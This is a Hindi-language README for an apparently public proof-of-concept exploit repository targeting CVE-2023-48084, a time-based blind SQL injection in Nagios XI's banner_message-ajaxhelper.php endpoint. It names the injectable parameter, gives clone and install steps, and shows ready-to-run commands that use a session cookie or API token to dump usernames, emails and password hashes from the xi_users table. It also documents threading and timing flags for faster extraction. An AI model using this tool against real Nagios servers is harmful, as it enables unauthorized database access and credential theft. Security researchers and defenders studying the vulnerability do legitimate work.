
Nagios XI में समय-आधारित ब्लाइंड SQLi का शोषण करके डेटाबेस सामग्री निकालने वाला Python PoC, मल्टीथ्रेडेड बाइनरी-सर्च निष्कर्षण और CLI स्कीमा/टेबल/कॉलम चयन के साथ।
Repository: MettHK/CVE-2023-48084-Revised
Hamibubu/CVE-2023-48084 का अद्यतन संस्करण जिसमें मल्टीथ्रेडिंग, बाइनरी-सर्च निष्कर्षण, और डेटाबेस / टेबल / कॉलम चयन के लिए CLI फ़्लैग शामिल हैं।
मूल repository नहीं है। यह एक व्युत्पन्न/बेहतर PoC है। मूल कार्य का श्रेय Hamibubu को जाता है।
केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उपयोग के लिए। इसे उन सिस्टमों के विरुद्ध उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है। लेखक और योगदानकर्ता दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।
CVE-2023-48084: संस्करण 5.11.3 से पहले का Nagios XI बल्क संशोधन टूल के माध्यम से SQL इंजेक्शन भेद्यता रखता है।
यह PoC निम्नलिखित पर time-based blind SQL injection का दुरुपयोग करता है:
/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SQL)
आपको एक मान्य non-admin सत्र कुकी (nagiosxi) या एक की आवश्यकता है।
| Area | What changed |
|---|---|
| Extraction | स्ट्रिंग लंबाई और ASCII वर्णों के लिए बाइनरी सर्च (बहुत कम अनुरोध) |
| Performance | मल्टीथ्रेडेड कैरेक्टर निष्कर्षण (-w / --workers) |
| CLI | -d / --database — स्कीमा खोज छोड़ें |
| CLI | -t / --table — टेबल खोज छोड़ें (-d आवश्यक है) |
| CLI | -C / --columns — अल्पविराम से अलग किए गए कॉलम, कॉलम खोज छोड़ें (-t आवश्यक है) |
| Timing | कॉन्फ़िगर करने योग्य --delay, --threshold, --max-length |
| Robustness | प्रति-थ्रेड HTTP सत्र; वैकल्पिक pwntools (प्रगति बार) सादे फ़ॉलबैक के साथ |
| Docs | मूल का श्रेय/लिंक; उदाहरणों में कोई लैब होस्टनाम या CTF आर्टिफैक्ट नहीं |
requests (आवश्यक)pwntools (वैकल्पिक; बेहतर प्रगति आउटपुट)git clone https://github.com/MettHK/CVE-2023-48084-Revised.git
cd CVE-2023-48084-Revised
pip install -r requirements.txt
# Interactive (discover schemas → tables → columns)
python3 CVE-2023-48084.py -u https://target.example/nagiosxi -c '<cookie>'
python3 CVE-2023-48084.py -u https://target.example/nagiosxi -a '<api_token>'
# Fast path: database + table + columns known
python3 CVE-2023-48084.py \
-u https://target.example/nagiosxi \
-c '<cookie>' \
-d nagiosxi \
-t xi_users \
-C username,email,password \
-w 15 \
--delay 1.2
मैं 2 से अधिक वर्कर्स उपयोग करने की अनुशंसा नहीं करता क्योंकि इससे गलत परिणाम वापस आ सकते हैं
| Flag | Description |
|---|---|
-u / --url | आधार URL (जैसे https://target.example/nagiosxi) |
-c / --cookie | nagiosxi सत्र कुकी का मान |
-a / --apiKey | API टोकन (-c के साथ एक साथ उपयोग न करें) |
-d / --database | स्कीमा/डेटाबेस नाम (स्कीमा एन्यूमरेशन छोड़ें) |
-t / --table | टेबल नाम (टेबल एन्यूमरेशन छोड़ें; -d आवश्यक है) |
-C / --columns | अल्पविराम से अलग किए गए कॉलम (कॉलम एन्यूमरेशन छोड़ें; -t आवश्यक है) |
-w / --workers | समानांतर थ्रेड (डिफ़ॉल्ट: 10) |
--delay | सही शाखा पर SLEEP सेकंड (डिफ़ॉल्ट: 1.5) |
--threshold | हिट मानने के लिए न्यूनतम प्रतिक्रिया समय (डिफ़ॉल्ट: delay * 0.8) |
--max-length | लंबाई बाइनरी सर्च के लिए ऊपरी सीमा (डिफ़ॉल्ट: 2048) |
--delay बढ़ाएँ (जैसे 2) या -w घटाएँ (जैसे 5)।-w 15–20)।-d / -t / -C को प्राथमिकता दें।